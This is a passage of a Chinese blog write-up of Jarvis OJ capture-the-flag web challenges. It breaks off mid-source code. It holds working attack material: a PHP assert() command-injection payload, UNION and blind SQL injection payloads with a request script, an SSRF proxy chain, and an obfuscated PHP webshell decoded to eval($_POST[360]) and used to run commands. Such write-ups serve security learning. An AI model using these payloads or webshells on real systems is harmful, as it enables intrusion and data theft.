class="number">227</span>, <span class="number">126</span>, <span class="number">43</span>, <span class="number">143</span>, <span class="number">225</span>, <span class="number">85</span>, <span class="number">224</span>, <span class="number">141</span>, <span class="number">232</span>, <span class="number">141</span>, <span class="number">5</span>, <span class="number">233</span>, <span class="number">69</span>, <span class="number">70</span>, <span class="number">204</span>, <span class="number">155</span>, <span class="number">141</span>], [<span class="number">212</span>, <span class="number">83</span>, <span class="number">219</span>, <span class="number">55</span>, <span class="number">132</span>, <span class="number">5</span>, <span class="number">153</span>, <span class="number">11</span>, <span class="number">0</span>, <span class="number">89</span>, <span class="number">134</span>, <span class="number">201</span>, <span class="number">255</span>, <span class="number">101</span>, <span class="number">22</span>, <span class="number">98</span>, <span class="number">215</span>, <span class="number">139</span>, <span class="number">0</span>, <span class="number">78</span>, <span class="number">165</span>, <span class="number">0</span>, <span class="number">126</span>, <span class="number">48</span>, <span class="number">119</span>], [<span class="number">194</span>, <span class="number">156</span>, <span class="number">10</span>, <span class="number">212</span>, <span class="number">237</span>, <span class="number">112</span>, <span class="number">17</span>, <span class="number">158</span>, <span class="number">225</span>, <span class="number">227</span>, <span class="number">152</span>, <span class="number">121</span>, <span class="number">56</span>, <span class="number">10</span>, <span class="number">238</span>, <span class="number">74</span>, <span class="number">76</span>, <span class="number">66</span>, <span class="number">80</span>, <span class="number">31</span>, <span class="number">73</span>, <span class="number">10</span>, <span class="number">180</span>, <span class="number">45</span>, <span class="number">94</span>], [<span class="number">110</span>, <span class="number">231</span>, <span class="number">82</span>, <span class="number">180</span>, <span class="number">109</span>, <span class="number">209</span>, <span class="number">239</span>, <span class="number">163</span>, <span class="number">30</span>, <span class="number">160</span>, <span class="number">60</span>, <span class="number">190</span>, <span class="number">97</span>, <span class="number">256</span>, <span class="number">141</span>, <span class="number">199</span>, <span class="number">3</span>, <span class="number">30</span>, <span class="number">235</span>, <span class="number">73</span>, <span class="number">225</span>, <span class="number">244</span>, <span class="number">141</span>, <span class="number">123</span>, <span class="number">208</span>], [<span class="number">220</span>, <span class="number">248</span>, <span class="number">136</span>, <span class="number">245</span>, <span class="number">123</span>, <span class="number">82</span>, <span class="number">120</span>, <span class="number">65</span>, <span class="number">68</span>, <span class="number">136</span>, <span class="number">151</span>, <span class="number">173</span>, <span class="number">104</span>, <span class="number">107</span>, <span class="number">172</span>, <span class="number">148</span>, <span class="number">54</span>, <span class="number">218</span>, <span class="number">42</span>, <span class="number">233</span>, <span class="number">57</span>, <span class="number">115</span>, <span class="number">5</span>, <span class="number">50</span>, <span class="number">196</span>], [<span class="number">190</span>, <span class="number">34</span>, <span class="number">140</span>, <span class="number">52</span>, <span class="number">160</span>, <span class="number">34</span>, <span class="number">201</span>, <span class="number">48</span>, <span class="number">214</span>, <span class="number">33</span>, <span class="number">219</span>, <span class="number">183</span>, <span class="number">224</span>, <span class="number">237</span>, <span class="number">157</span>, <span class="number">245</span>, <span class="number">1</span>, <span class="number">134</span>, <span class="number">13</span>, <span class="number">99</span>, <span class="number">212</span>, <span class="number">230</span>, <span class="number">243</span>, <span class="number">236</span>, <span class="number">40</span>], [<span class="number">144</span>, <span class="number">246</span>, <span class="number">73</span>, <span class="number">161</span>, <span class="number">134</span>, <span class="number">112</span>, <span class="number">146</span>, <span class="number">212</span>, <span class="number">121</span>, <span class="number">43</span>, <span class="number">41</span>, <span class="number">174</span>, <span class="number">146</span>, <span class="number">78</span>, <span class="number">235</span>, <span class="number">202</span>, <span class="number">200</span>, <span class="number">90</span>, <span class="number">254</span>, <span class="number">216</span>, <span class="number">113</span>, <span class="number">25</span>, <span class="number">114</span>, <span class="number">232</span>, <span class="number">123</span>], [<span class="number">158</span>, <span class="number">85</span>, <span class="number">116</span>, <span class="number">97</span>, <span class="number">145</span>, <span class="number">21</span>, <span class="number">105</span>, <span class="number">2</span>, <span class="number">256</span>, <span class="number">69</span>, <span class="number">21</span>, <span class="number">152</span>, <span class="number">155</span>, <span class="number">88</span>, <span class="number">11</span>, <span class="number">232</span>, <span class="number">146</span>, <span class="number">238</span>, <span class="number">170</span>, <span class="number">123</span>, <span class="number">135</span>, <span class="number">150</span>, <span class="number">161</span>, <span class="number">249</span>, <span class="number">236</span>], [<span class="number">251</span>, <span class="number">96</span>, <span class="number">103</span>, <span class="number">188</span>, <span class="number">188</span>, <span class="number">8</span>, <span class="number">33</span>, <span class="number">39</span>, <span class="number">237</span>, <span class="number">63</span>, <span class="number">230</span>, <span class="number">128</span>, <span class="number">166</span>, <span class="number">130</span>, <span class="number">141</span>, <span class="number">112</span>, <span class="number">254</span>, <span class="number">234</span>, <span class="number">113</span>, <span class="number">250</span>, <span class="number">1</span>, <span class="number">89</span>, <span class="number">0</span>, <span class="number">135</span>, <span class="number">119</span>], [<span class="number">192</span>, <span class="number">206</span>, <span class="number">73</span>, <span class="number">92</span>, <span class="number">174</span>, <span class="number">130</span>, <span class="number">164</span>, <span class="number">95</span>, <span class="number">21</span>, <span class="number">153</span>, <span class="number">82</span>, <span class="number">254</span>, <span class="number">20</span>, <span class="number">133</span>, <span class="number">56</span>, <span class="number">7</span>, <span class="number">163</span>, <span class="number">48</span>, <span class="number">7</span>, <span class="number">206</span>, <span class="number">51</span>, <span class="number">204</span>, <span class="number">136</span>, <span class="number">180</span>, <span class="number">196</span>], [<span class="number">106</span>, <span class="number">63</span>, <span class="number">252</span>, <span class="number">202</span>, <span class="number">153</span>, <span class="number">6</span>, <span class="number">193</span>, <span class="number">146</span>, <span class="number">88</span>, <span class="number">118</span>, <span class="number">78</span>, <span class="number">58</span>, <span class="number">214</span>, <span class="number">168</span>, <span class="number">68</span>, <span class="number">128</span>, <span class="number">68</span>, <span class="number">35</span>, <span class="number">245</span>, <span class="number">144</span>, <span class="number">102</span>, <span class="number">20</span>, <span class="number">194</span>, <span class="number">207</span>, <span class="number">66</span>], [<span class="number">154</span>, <span class="number">98</span>, <span class="number">219</span>, <span class="number">2</span>, <span class="number">13</span>, <span class="number">65</span>, <span class="number">131</span>, <span class="number">185</span>, <span class="number">27</span>, <span class="number">162</span>, <span class="number">214</span>, <span class="number">63</span>, <span class="number">238</span>, <span class="number">248</span>, <span class="number">38</span>, <span class="number">129</span>, <span class="number">170</span>, <span class="number">180</span>, <span class="number">181</span>, <span class="number">96</span>, <span class="number">165</span>, <span class="number">78</span>, <span class="number">121</span>, <span class="number">55</span>, <span class="number">214</span>], [<span class="number">193</span>, <span class="number">94</span>, <span class="number">107</span>, <span class="number">45</span>, <span class="number">83</span>, <span class="number">56</span>, <span class="number">2</span>, <span class="number">41</span>, <span class="number">58</span>, <span class="number">169</span>, <span class="number">120</span>, <span class="number">58</span>, <span class="number">105</span>, <span class="number">178</span>, <span class="number">58</span>, <span class="number">217</span>, <span class="number">18</span>, <span class="number">93</span>, <span class="number">212</span>, <span class="number">74</span>, <span class="number">18</span>, <span class="number">217</span>, <span class="number">219</span>, <span class="number">89</span>, <span class="number">212</span>], [<span class="number">164</span>, <span class="number">228</span>, <span class="number">5</span>, <span class="number">133</span>, <span class="number">175</span>, <span class="number">164</span>, <span class="number">37</span>, <span class="number">176</span>, <span class="number">94</span>, <span class="number">232</span>, <span class="number">82</span>, <span class="number">0</span>, <span class="number">47</span>, <span class="number">212</span>, <span class="number">107</span>, <span class="number">111</span>, <span class="number">97</span>, <span class="number">153</span>, <span class="number">119</span>, <span class="number">85</span>, <span class="number">147</span>, <span class="number">256</span>, <span class="number">130</span>, <span class="number">248</span>, <span class="number">235</span>], [<span class="number">221</span>, <span class="number">178</span>, <span class="number">50</span>, <span class="number">49</span>, <span class="number">39</span>, <span class="number">215</span>, <span class="number">200</span>, <span class="number">188</span>, <span class="number">105</span>, <span class="number">101</span>, <span class="number">172</span>, <span class="number">133</span>, <span class="number">28</span>, <span class="number">88</span>, <span class="number">83</span>, <span class="number">32</span>, <span class="number">45</span>, <span class="number">13</span>, <span class="number">215</span>, <span class="number">204</span>, <span class="number">141</span>, <span class="number">226</span>, <span class="number">118</span>, <span class="number">233</span>, <span class="number">156</span>], [<span class="number">236</span>, <span class="number">142</span>, <span class="number">87</span>, <span class="number">152</span>, <span class="number">97</span>, <span class="number">134</span>, <span class="number">54</span>, <span class="number">239</span>, <span class="number">49</span>, <span class="number">220</span>, <span class="number">233</span>, <span class="number">216</span>, <span class="number">13</span>, <span class="number">143</span>, <span class="number">145</span>, <span class="number">112</span>, <span class="number">217</span>, <span class="number">194</span>, <span class="number">114</span>, <span class="number">221</span>, <span class="number">150</span>, <span class="number">51</span>, <span class="number">136</span>, <span class="number">31</span>, <span class="number">198</span>]], n = <span class="number">0</span>; n &lt; <span class="number">25</span>; n++) </span><br><span class="line">&#123;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>, a = <span class="number">0</span>; a &lt; <span class="number">25</span>; a++) </span><br><span class="line">  i += t[a] * o[n][a]; </span><br><span class="line">  <span class="keyword">if</span> (i !== r[n]) <span class="keyword">return</span> ! <span class="number">1</span></span><br><span class="line"> &#125; </span><br><span class="line"><span class="keyword">return</span> ! <span class="number">0</span></span><br></pre></td></tr></table></figure>
<p>直接给payload的了</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span>  numpy <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> gmpy2</span><br><span class="line">r = [<span class="number">325799</span>, <span class="number">309234</span>, <span class="number">317320</span>, <span class="number">327895</span>, <span class="number">298316</span>, <span class="number">301249</span>, <span class="number">330242</span>, <span class="number">289290</span>, <span class="number">273446</span>, <span class="number">337687</span>, <span class="number">258725</span>, <span class="number">267444</span>, <span class="number">373557</span>, <span class="number">322237</span>,</span><br><span class="line">     <span class="number">344478</span>, <span class="number">362136</span>, <span class="number">331815</span>, <span class="number">315157</span>, <span class="number">299242</span>, <span class="number">305418</span>, <span class="number">313569</span>, <span class="number">269307</span>, <span class="number">338319</span>, <span class="number">306491</span>, <span class="number">351259</span>]</span><br><span class="line">o = [</span><br><span class="line">    [<span class="number">11</span>, <span class="number">13</span>, <span class="number">32</span>, <span class="number">234</span>, <span class="number">236</span>, <span class="number">3</span>, <span class="number">72</span>,</span><br><span class="line">     <span class="number">237</span>, <span class="number">122</span>, <span class="number">230</span>, <span class="number">157</span>, <span class="number">53</span>, <span class="number">7</span>, <span class="number">225</span>, <span class="number">193</span>, <span class="number">76</span>, <span class="number">142</span>, <span class="number">166</span>, <span class="number">11</span>, <span class="number">196</span>, <span class="number">194</span>, <span class="number">187</span>, <span class="number">152</span>, <span class="number">132</span>, <span class="number">135</span>],</span><br><span class="line">    ...]</span><br><span class="line">a_o=array(o)</span><br><span class="line">a_r=array(r)</span><br><span class="line">t = linalg.solve(o,r)</span><br><span class="line"><span class="keyword">print</span> t</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> t:</span><br><span class="line">    <span class="keyword">print</span> str(int(round(i))),</span><br><span class="line"><span class="comment"># QWB&#123;R3ac7_1s_interesting&#125;</span></span><br></pre></td></tr></table></figure>
<h2 id="babyphp"><a href="#babyphp" class="headerlink" title="babyphp"></a>babyphp</h2><p>根据提示猜测存在git源码泄露<br>使用GitHack获取源码<br>index.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'page'</span>])) &#123;</span><br><span class="line">	$page = $_GET[<span class="string">'page'</span>];</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">	$page = <span class="string">"home"</span>;</span><br><span class="line">&#125;</span><br><span class="line">$file = <span class="string">"templates/"</span> . $page . <span class="string">".php"</span>;</span><br><span class="line">assert(<span class="string">"strpos('$file', '..') === false"</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">"Detected hacking attempt!"</span>);</span><br><span class="line">assert(<span class="string">"file_exists('$file')"</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">"That file doesn't exist!"</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>第一次见assert这样用,显然通过闭合引号达到任意命令执行<br>payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">assert(<span class="string">"strpos('templates/'.system("</span>cat templates/flag.php<span class="string">").'.php', '..') === false"</span>)</span><br></pre></td></tr></table></figure>
<p>即<code>?page=%27.system(&quot;cat%20templates/flag.php&quot;).%27</code></p>
<h2 id="admin"><a href="#admin" class="headerlink" title="admin"></a>admin</h2><p>查看robots.txt</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Disallow: /admin_s3cr3t.php</span><br></pre></td></tr></table></figure>
<p>访问admin_s3cr3t.php<br><img src="//desperadoccy.github.io/2020/02/15/jarvis/12.png" alt="test"></p>
<p>查看cookie,发现有个admin,将其值修改为1再访问得到flag</p>
<h2 id="inject"><a href="#inject" class="headerlink" title="inject"></a>inject</h2><p>查看index.php~发现源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">require</span>(<span class="string">"config.php"</span>);</span><br><span class="line">$table = $_GET[<span class="string">'table'</span>]?$_GET[<span class="string">'table'</span>]:<span class="string">"test"</span>;</span><br><span class="line">$table = Filter($table);</span><br><span class="line">mysqli_query($mysqli,<span class="string">"desc `secret_&#123;$table&#125;`"</span>) <span class="keyword">or</span> Hacker();</span><br><span class="line">$sql = <span class="string">"select 'flag&#123;xxx&#125;' from secret_&#123;$table&#125;"</span>;</span><br><span class="line">$ret = sql_query($sql);</span><br><span class="line"><span class="keyword">echo</span> $ret[<span class="number">0</span>];</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>我们发现了反引号，需要让这段代码中的SQL语句能运行成功才能进入下一条查询语句中。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysqli_query($mysqli,<span class="string">"desc `secret_&#123;$table&#125;`"</span>) <span class="keyword">or</span> Hacker();</span><br></pre></td></tr></table></figure>
<p><strong>反引号是为了区分MySQL的保留字与普通字符而引入的符号。不加反引号建的表不能包含MYSQL保留字符，否则出错。</strong></p>
<ul>
<li>在标准 SQL 中，字符串使用的是单引号。</li>
<li>如果字符串本身也包括单引号，则使用两个单引号（注意，不是双引号，字符串中的双引号不需要另外转义）。</li>
<li>MySQL对 SQL 的扩展，允许使用单引号和双引号两种。<br>我们发现在使用反引号时，只要前表table1存在，即使table2不存在，该语句也是能执行的</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">desc `table1` `table2`</span><br><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="string">`table1`</span> <span class="string">`table2`</span></span><br></pre></td></tr></table></figure>
<p>单引号不适用,并且这边的table2会转为table1的别名</p>
<p>而查看源码可以发现<code>secret_test</code>这个表是存在的,所以我们可以通过</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?table=test` `xxxxx</span><br></pre></td></tr></table></figure>
<p>绕过<br>进而执行下一条语句</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="string">'flag&#123;xxx&#125;'</span> <span class="keyword">from</span> secret_&#123;$<span class="keyword">table</span>&#125;</span><br><span class="line"><span class="comment">/*语句也就变成了*/</span></span><br><span class="line"><span class="keyword">select</span> <span class="string">'flag&#123;xxx&#125;'</span> <span class="keyword">from</span> secret_test<span class="string">` `</span>xxxxx</span><br></pre></td></tr></table></figure>
<p>上文也说了只要表一存在,表二不存在也是能执行的,这里也适用<br>所以我们只要在<code>xxxxx</code>处填充<code>union注入语句</code>就行了<br>payload</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">?table=test` ` union <span class="keyword">select</span> <span class="keyword">database</span>() <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span></span><br><span class="line"><span class="comment">/*爆库 61d300*/</span></span><br><span class="line">?<span class="keyword">table</span>=<span class="keyword">test</span><span class="string">` `</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="keyword">group_concat</span>(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="keyword">database</span>() <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span></span><br><span class="line"><span class="comment">/*爆表 secret_flag,secret_test*/</span></span><br><span class="line">?<span class="keyword">table</span>=<span class="keyword">test</span><span class="string">` `</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="keyword">group_concat</span>(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema=<span class="keyword">database</span>() <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span></span><br><span class="line"><span class="comment">/*爆字段 flagUwillNeverKnow,username*/</span></span><br><span class="line">?<span class="keyword">table</span>=<span class="keyword">test</span><span class="string">` `</span> <span class="keyword">union</span> <span class="keyword">select</span> flagUwillNeverKnow <span class="keyword">from</span> secret_flag <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span></span><br><span class="line"><span class="comment">/*getflag*/</span></span><br></pre></td></tr></table></figure>
<h2 id="Simple-Injection"><a href="#Simple-Injection" class="headerlink" title="Simple Injection"></a>Simple Injection</h2><p><strong>方法一</strong><br>打开题目第一直觉sql注入<br>尝试POST <code>username=admin&amp;password=1</code> 回显密码错误<br>POST <code>username=admin&#39;&amp;password=1</code> 回显用户名错误<br>POST <code>username=admin&#39; #&amp;password=1</code> 回显密码错误<br>POST <code>username=admin&#39; and 1=1#&amp;password=1</code> 回显用户名错误<br>即<code>and 1=1</code>处存在问题<br>猜测过滤了<code>and</code>或者<code>空格</code><br>重新POST <code>username=admin&#39; and/**/1=1#&amp;password=1</code> 回显密码错误<br>接着POST <code>username=admin&#39; union/**/select/**/1#&amp;password=1</code> 依旧回显密码错误<br>猜测存在md5加密 POST<code>username=admin&#39; union/**/select/**/md5(1)#&amp;password=1</code> getflag</p>
<p>总结:其实挺迷的,第一个空格他没有过滤反而后面的被过滤了,有一丝不解.</p>
<p><strong>方法二</strong><br>sql盲注,sleep函数未过滤<br>直接给payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding:utf8 -*-</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"></span><br><span class="line">str1 = <span class="string">'1234567890'</span> + string.ascii_letters + string.punctuation</span><br><span class="line">flag = <span class="string">''</span></span><br><span class="line"></span><br><span class="line">select0 = <span class="string">'select/**/database()'</span></span><br><span class="line">select1 = <span class="string">'select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()'</span></span><br><span class="line">select2 = <span class="string">'select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()'</span></span><br><span class="line">select = <span class="string">'select/**/password/**/from/**/admin'</span></span><br><span class="line">url = <span class="string">"http://web.jarvisoj.com:32787/login.php"</span></span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">66</span>):</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> str1:</span><br><span class="line">        paylaod = <span class="string">"admin'/**/and/**/(if(substr((&#123;&#125;),&#123;&#125;,1)='&#123;&#125;',1,0))/**/and/**/'1"</span>.format(select, j, i)</span><br><span class="line">        <span class="comment"># print(paylaod)</span></span><br><span class="line">        data = &#123;</span><br><span class="line">            <span class="string">'username'</span>: paylaod,</span><br><span class="line">            <span class="string">'password'</span>: <span class="string">'admin'</span></span><br><span class="line">        &#125;</span><br><span class="line">        r = requests.post(url, data=data)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">'密码错误'</span> <span class="keyword">in</span> r.text:</span><br><span class="line">            flag += i</span><br><span class="line">            print(flag)</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>
<p>获得md5密码后<code>334cfb59c9d74849801d5acdcfdaadc3</code>,通过解密网站解密后得<code>eTAloCrEP</code>,登陆拿到flag</p>
<h2 id="Chopper"><a href="#Chopper" class="headerlink" title="Chopper"></a>Chopper</h2><p>f12查看源码，发现<code>proxy.php?url=http://dn.jarvisoj.com/static/images/proxy.jpg</code>,猜测是ssrf<br>访问admin,发现hint<code>&lt;!--&lt;script&gt;alert(&#39;admin ip is 202.5.19.128&#39;)&lt;/script&gt;--&gt;</code><br>尝试访问<code>proxy.php?url=http://202.5.19.128</code><br>发现url被重定向到<code>http://web.jarvisoj.com:32782/index.php?url=http://8080av.com</code><br>可见是可访问的,尝试访问<code>http://202.5.19.128/admin/</code>和<code>http://202.5.19.128/proxy.php</code><br>proxy.php可访问,那我们再利用此页面访问原站<br>即<code>http://web.jarvisoj.com:32782/proxy.php?url=http://202.5.19.128/proxy.php?url=http://web.jarvisoj.com:32782/admin/</code><br>得到提示,you are closing<br>尝试扫描此页面<br>发现robots.txt</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">User-agent: *</span><br><span class="line">Disallow:trojan.php</span><br><span class="line">Disallow:trojan.php.txt</span><br></pre></td></tr></table></figure>
<p>访问得到</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> $&#123;(<span class="string">"#"</span>^<span class="string">"|"</span>).(<span class="string">"#"</span>^<span class="string">"|"</span>)&#125;=(<span class="string">"!"</span>^<span class="string">"`"</span>).(<span class="string">"( "</span>^<span class="string">"&#123;"</span>).(<span class="string">"("</span>^<span class="string">"["</span>).(<span class="string">"~"</span>^<span class="string">";"</span>).(<span class="string">"|"</span>^<span class="string">"."</span>).(<span class="string">"*"</span>^<span class="string">"~"</span>);$&#123;(<span class="string">"#"</span>^<span class="string">"|"</span>).(<span class="string">"#"</span>^<span class="string">"|"</span>)&#125;((<span class="string">"-"</span>^<span class="string">"H"</span>). (<span class="string">"]"</span>^<span class="string">"+"</span>). (<span class="string">"["</span>^<span class="string">":"</span>). (<span class="string">","</span>^<span class="string">"@"</span>). (<span class="string">"&#125;"</span>^<span class="string">"U"</span>). (<span class="string">"e"</span>^<span class="string">"A"</span>). (<span class="string">"("</span>^<span class="string">"w"</span>).(<span class="string">"j"</span>^<span class="string">":"</span>). (<span class="string">"i"</span>^<span class="string">"&amp;"</span>). (<span class="string">"#"</span>^<span class="string">"p"</span>). (<span class="string">"&gt;"</span>^<span class="string">"j"</span>). (<span class="string">"!"</span>^<span class="string">"z"</span>). (<span class="string">"T"</span>^<span class="string">"g"</span>). (<span class="string">"e"</span>^<span class="string">"S"</span>). (<span class="string">"_"</span>^<span class="string">"o"</span>). (<span class="string">"?"</span>^<span class="string">"b"</span>). (<span class="string">"]"</span>^<span class="string">"t"</span>));<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>发现php代码被混淆,直接利用php命令执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PHP Warning:  Cannot call assert() with string argument dynamically in C:\Users\desperado\Desktop\1.php on line 1</span><br><span class="line"></span><br><span class="line">Warning: Cannot call assert() with string argument dynamically in C:\Users\desperado\Desktop\1.php on line 1</span><br></pre></td></tr></table></figure>
<p>由于我本地环境是php7,assert使用于php5,所以用php5重新执行一遍</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Notice: Undefined offset: 360 in D:\APP\phpstudy\PHPTutorial\WWW\1.php(1) : assert code on line 1</span><br><span class="line"></span><br><span class="line">Warning: assert(): Assertion &quot;eval($_POST[360])&quot; failed in D:\APP\phpstudy\PHPTutorial\WWW\1.php on line 1</span><br></pre></td></tr></table></figure>
<p>得到密码<code>360</code><br>访问木马界面,Post命令<code>360=cat flag.jpg</code>,得到flag</p>
<p><img src="//desperadoccy.github.io/2020/02/15/jarvis/13.png" alt="test"></p>
<h2 id="flag在管理员手中"><a href="#flag在管理员手中" class="headerlink" title="flag在管理员手中"></a>flag在管理员手中</h2><p>截包发现两个cookie<br><code>role=s%3A5%3A%22guest%22%3B</code><br><code>hsh=3a4727d57463f122833d9e732f94e4e0</code><br>猜测是hash长度扩展攻击,爆破目录发现<code>index.php~</code>文件<br>分析文件格式发现是vim的<code>.swp</code>异常文件<br><img src="//desperadoccy.github.io/2020/02/15/jarvis/14.png" alt="test"><br>将文件名改为<code>index.php.swp</code>,然后通过<code>vim -r index.php.swp</code>修复文件<br>得到源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">&lt;title&gt;Web <span class="number">350</span>&lt;/title&gt;</span><br><span class="line">&lt;style type=<span class="string">"text/css"</span>&gt;</span><br><span class="line">	body &#123;</span><br><span class="line">		background:gray;</span><br><span class="line">		text-align:center;</span><br><span class="line">	&#125;</span><br><span class="line">&lt;/style&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line"></span><br><span class="line">&lt;body&gt;</span><br><span class="line">	<span class="meta">&lt;?php</span> </span><br><span class="line">		$auth = <span class="keyword">false</span>;</span><br><span class="line">		$role = <span class="string">"guest"</span>;</span><br><span class="line">		$salt = </span><br><span class="line">		<span class="keyword">if</span> (<span class="keyword">isset</span>($_COOKIE[<span class="string">"role"</span>])) &#123;</span><br><span class="line">			$role = unserialize($_COOKIE[<span class="string">"role"</span>]);</span><br><span class="line">			$hsh = $_COOKIE[<span class="string">"hsh"</span>];</span><br><span class="line">			<span class="keyword">if</span> ($role===<span class="string">"admin"</span> &amp;&amp; $hsh === md5($salt.strrev($_COOKIE[<span class="string">"role"</span>]))) &#123;</span><br><span class="line">				$auth = <span class="keyword">true</span>;</span><br><span class="line">			&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">				$auth = <span class="keyword">false</span>;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">			$s = serialize($role);</span><br><span class="line">			setcookie(<span class="string">'role'</span>,$s);</span><br><span class="line">			$hsh = md5($salt.strrev($s));</span><br><span class="line">			setcookie(<span class="string">'hsh'</span>,$hsh);</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span> ($auth) &#123;</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">"&lt;h3&gt;Welcome Admin. Your flag is </span></span><br><span class="line"><span class="string">		&#125; else &#123;</span></span><br><span class="line"><span class="string">			echo "</span>&lt;h3&gt;Only Admin can see the 